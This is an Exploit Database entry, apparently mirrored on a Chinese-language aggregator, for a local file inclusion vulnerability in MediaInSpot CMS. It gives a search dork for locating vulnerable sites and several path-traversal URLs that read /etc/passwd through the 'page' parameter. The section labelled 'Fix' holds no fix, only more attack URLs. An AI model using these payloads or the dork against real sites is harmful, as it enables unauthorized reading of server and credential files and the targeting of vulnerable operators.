MediaInSpot CMS – Local File Inclusion (2)

• Exploit Database
• 6 阅读

• 作者： wlhaan haker
  日期： 2011-05-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17292/

• #Name : Media In Spot LFI Vulnerability
  #Date : May,16 2011
  #Vendor Url :http:http://www.mediainspot.com/
  
  #Dork:"
  "Powred By Media In Spot""
  
  #Author : wlhaan haker <iit[at]hotmail.com>
  
  
  ###############################################################################################################
  Exploit:
  http://server/path/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
   
  ###############################################################################################################
  Fix:
  
  demo
  
  http://site.com/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
  
  http://site.com/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
  
  http://site.com/ufp/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd